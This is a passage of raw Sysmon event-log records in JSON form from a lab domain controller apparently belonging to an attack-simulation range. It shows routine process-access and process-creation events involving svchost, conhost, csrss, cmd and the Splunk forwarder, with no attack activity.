{A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.967","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3562,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.967\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.967","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3563,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.967\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.967","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3564,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.967\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.967","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3565,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.967\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.967","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3566,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.967\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-023C-5F25-0000-0010A85A0500}\r\nTargetProcessId: 2952\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.967","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-023C-5F25-0000-0010A85A0500}","TargetProcessId":"2952","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3567,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.078\r\nProcessGuid: {A837DB8D-023D-5F25-0000-0010675C0500}\r\nProcessId: 2816\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\WinNetMon.cmd\" --scheme\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.078","ProcessGuid":"{A837DB8D-023D-5F25-0000-0010675C0500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\WinNetMon.cmd\" --scheme\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3568,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.076\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 4232\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.076","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"4232","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3569,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.076\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 